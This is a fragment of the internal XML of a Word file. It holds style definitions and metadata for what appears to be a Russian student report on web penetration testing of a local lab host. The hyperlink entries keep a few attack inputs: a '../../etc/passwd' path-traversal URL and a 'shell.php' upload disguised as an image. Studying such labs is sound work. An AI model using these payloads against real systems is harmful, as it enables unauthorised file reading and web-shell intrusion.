    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008E0171"/>
    <w:pPr>
      <w:suppressAutoHyphens/>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8E0171"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aff1">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008E0171"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aff2">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="008E0171"/>
    <w:rPr>
      <w:color w:val="666666"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Standard">
    <w:name w:val="Standard"/>
    <w:rsid w:val="008E0171"/>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character" w:customStyle="1" w:styleId="markdown-word">
    <w:name w:val="markdown-word"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="008E0171"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ds-markdown-paragraph">
    <w:name w:val="ds-markdown-paragraph"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="008E017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3">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0099286E"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff3">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="ac"/>
    <w:next w:val="ac"/>
    <w:link w:val="aff4"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007A50F8"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aff4">
    <w:name w:val="Тема примечания Знак"/>
    <w:basedOn w:val="ad"/>
    <w:link w:val="aff3"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="007A50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hyperlink" Target="mailto:uploaded=@shell.php;type=image/jpeg" TargetMode="External"/><Relationship Id="rId68"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3.png"/><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192.168.0.104/" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId66"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hyperlink" Target="http://192.168.0.104/login.php" TargetMode="External"/><Relationship Id="rId1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yperlink" Target="http://192.168.0.104/login.php&#160;curl-&#160;b&#160;cookies.txt" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header7.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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192.168.0.104:5000/api/users" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header6.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4.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId7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svg"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.0.104/vulnerabilities/fi/?page=../../etc/passwd" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.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3.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId65"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1.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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F8302-5F60-4A4F-BDC4-030CD7CB8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Pages>
  <Words>17551</Words>
  <Characters>100043</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>833</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Булаев</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Мошков Тимофей</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <cp:lastPrinted>2026-06-07T19:53:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-04T13:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-07T19:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>